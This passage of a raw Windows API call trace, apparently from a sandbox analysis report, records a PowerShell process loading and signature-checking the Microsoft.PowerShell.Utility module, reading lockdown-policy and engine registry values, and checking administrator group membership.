lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0223.323] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0223.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d41c) returned 1 [0223.323] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x933d498 | out: lpFileInformation=0x933d498*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0223.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d418) returned 1 [0223.323] GetSystemInfo (in: lpSystemInfo=0x933d4cc | out: lpSystemInfo=0x933d4cc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0223.324] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x933d45c | out: phkResult=0x933d45c*=0x8b4) returned 0x0 [0223.328] RegQueryValueExW (in: hKey=0x8b4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x933d478, lpData=0x0, lpcbData=0x933d474*=0x0 | out: lpType=0x933d478*=0x0, lpData=0x0, lpcbData=0x933d474*=0x0) returned 0x2 [0223.328] RegCloseKey (hKey=0x8b4) returned 0x0 [0223.328] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.328] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d448) returned 1 [0223.329] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x56c77ec | out: lpFileInformation=0x56c77ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0223.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d444) returned 1 [0223.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d408) returned 1 [0223.329] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x933d484 | out: lpFileInformation=0x933d484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0223.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d404) returned 1 [0223.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d37c) returned 1 [0223.330] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x933d3f8 | out: lpFileInformation=0x933d3f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0223.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d378) returned 1 [0223.330] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.330] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d350) returned 1 [0223.330] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8b4 [0223.330] GetFileType (hFile=0x8b4) returned 0x1 [0223.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d34c) returned 1 [0223.330] GetFileType (hFile=0x8b4) returned 0x1 [0223.331] WTGetSignatureInfo () returned 0x0 [0223.749] CertDuplicateCertificateContext (pCertContext=0x768a0f0) returned 0x768a0f0 [0223.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933d3b4 | out: phkResult=0x933d3b4*=0x8bc) returned 0x0 [0223.750] RegQueryValueExW (in: hKey=0x8bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933d3d4, lpData=0x0, lpcbData=0x933d3d0*=0x0 | out: lpType=0x933d3d4*=0x1, lpData=0x0, lpcbData=0x933d3d0*=0x56) returned 0x0 [0223.750] RegQueryValueExW (in: hKey=0x8bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933d3d4, lpData=0x56c7d10, lpcbData=0x933d3d0*=0x56 | out: lpType=0x933d3d4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933d3d0*=0x56) returned 0x0 [0223.750] RegCloseKey (hKey=0x8bc) returned 0x0 [0223.751] CoTaskMemAlloc (cb=0x10) returned 0x76ca3b0 [0223.751] CoTaskMemAlloc (cb=0x30) returned 0x767ae28 [0223.751] WinVerifyTrust () returned 0x0 [0223.754] CoTaskMemFree (pv=0x767ae28) [0223.754] CoTaskMemFree (pv=0x76ca3b0) [0223.754] CertFreeCertificateContext (pCertContext=0x768a0f0) returned 1 [0223.754] CloseHandle (hObject=0x8b4) returned 1 [0223.754] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.754] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d40c) returned 1 [0223.754] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8b4 [0223.755] GetFileType (hFile=0x8b4) returned 0x1 [0223.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d408) returned 1 [0223.755] GetFileType (hFile=0x8b4) returned 0x1 [0223.755] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x0 [0223.755] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.755] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x1000 [0223.755] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.756] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x2000 [0223.756] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.756] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x3000 [0223.756] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.756] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x4000 [0223.757] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.757] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x5000 [0223.757] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.758] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x6000 [0223.758] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x1000, lpOverlapped=0x0) returned 1 [0223.758] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x7000 [0223.758] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x780, lpOverlapped=0x0) returned 1 [0223.758] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x7780 [0223.758] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8428, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8428*, lpNumberOfBytesRead=0x933d474*=0x0, lpOverlapped=0x0) returned 1 [0223.758] SetFilePointer (in: hFile=0x8b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x933d448*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933d448*=0) returned 0x7780 [0223.759] ReadFile (in: hFile=0x8b4, lpBuffer=0x56c8d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933d474, lpOverlapped=0x0 | out: lpBuffer=0x56c8d08*, lpNumberOfBytesRead=0x933d474*=0x0, lpOverlapped=0x0) returned 1 [0223.759] CoTaskMemAlloc (cb=0x20c) returned 0x7881858 [0223.759] GetSystemDirectoryW (in: lpBuffer=0x7881858, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0223.759] CoTaskMemFree (pv=0x7881858) [0223.759] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0223.759] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0223.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d3a8) returned 1 [0223.759] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x933d424 | out: lpFileInformation=0x933d424*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0223.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d3a4) returned 1 [0223.759] GetSystemInfo (in: lpSystemInfo=0x933d458 | out: lpSystemInfo=0x933d458*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0223.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x933d3e8 | out: phkResult=0x933d3e8*=0x8a8) returned 0x0 [0223.761] RegQueryValueExW (in: hKey=0x8a8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x933d404, lpData=0x0, lpcbData=0x933d400*=0x0 | out: lpType=0x933d404*=0x0, lpData=0x0, lpcbData=0x933d400*=0x0) returned 0x2 [0223.761] RegCloseKey (hKey=0x8a8) returned 0x0 [0223.761] CloseHandle (hObject=0x8b4) returned 1 [0224.309] CoCreateGuid (in: pguid=0x933d51c | out: pguid=0x933d51c*(Data1=0xe7b693b2, Data2=0xe5dc, Data3=0x425b, Data4=([0]=0xbd, [1]=0x1c, [2]=0x25, [3]=0xf0, [4]=0x9, [5]=0x12, [6]=0x45, [7]=0xc1))) returned 0x0 [0224.309] GetCurrentProcess () returned 0xffffffff [0224.309] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x933d4e4 | out: TokenHandle=0x933d4e4*=0x8b4) returned 1 [0224.310] GetTokenInformation (in: TokenHandle=0x8b4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x933d4e8 | out: TokenInformation=0x0, ReturnLength=0x933d4e8) returned 0 [0224.310] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7895420 [0224.310] GetTokenInformation (in: TokenHandle=0x8b4, TokenInformationClass=0x8, TokenInformation=0x7895420, TokenInformationLength=0x4, ReturnLength=0x933d4e8 | out: TokenInformation=0x7895420, ReturnLength=0x933d4e8) returned 1 [0224.310] LocalFree (hMem=0x7895420) returned 0x0 [0224.310] DuplicateTokenEx (in: hExistingToken=0x8b4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x933d4f0 | out: phNewToken=0x933d4f0*=0x8a8) returned 1 [0224.310] CheckTokenMembership (in: TokenHandle=0x8a8, SidToCheck=0x57694c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x933d500 | out: IsMember=0x933d500) returned 1 [0224.311] CloseHandle (hObject=0x8a8) returned 1 [0224.314] QueryPerformanceCounter (in: lpPerformanceCount=0x933d28c | out: lpPerformanceCount=0x933d28c*=31934901879) returned 1 [0224.314] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0224.315] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0224.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d1c0) returned 1 [0224.315] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x933d23c | out: lpFileInformation=0x933d23c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0224.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d1bc) returned 1 [0224.315] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0224.315] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0224.315] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0224.315] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0224.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d134) returned 1 [0224.315] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x933d1b0 | out: lpFileInformation=0x933d1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d130) returned 1 [0224.316] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0224.316] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0224.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d108) returned 1 [0224.316] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8a8 [0224.316] GetFileType (hFile=0x8a8) returned 0x1 [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d104) returned 1 [0224.316] GetFileType (hFile=0x8a8) returned 0x1 [0224.316] WTGetSignatureInfo () returned 0x0 [0224.489] CertDuplicateCertificateContext (pCertContext=0x768a190) returned 0x768a190 [0224.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933d16c | out: phkResult=0x933d16c*=0x8dc) returned 0x0 [0224.490] RegQueryValueExW (in: hKey=0x8dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933d18c, lpData=0x0, lpcbData=0x933d188*=0x0 | out: lpType=0x933d18c*=0x1, lpData=0x0, 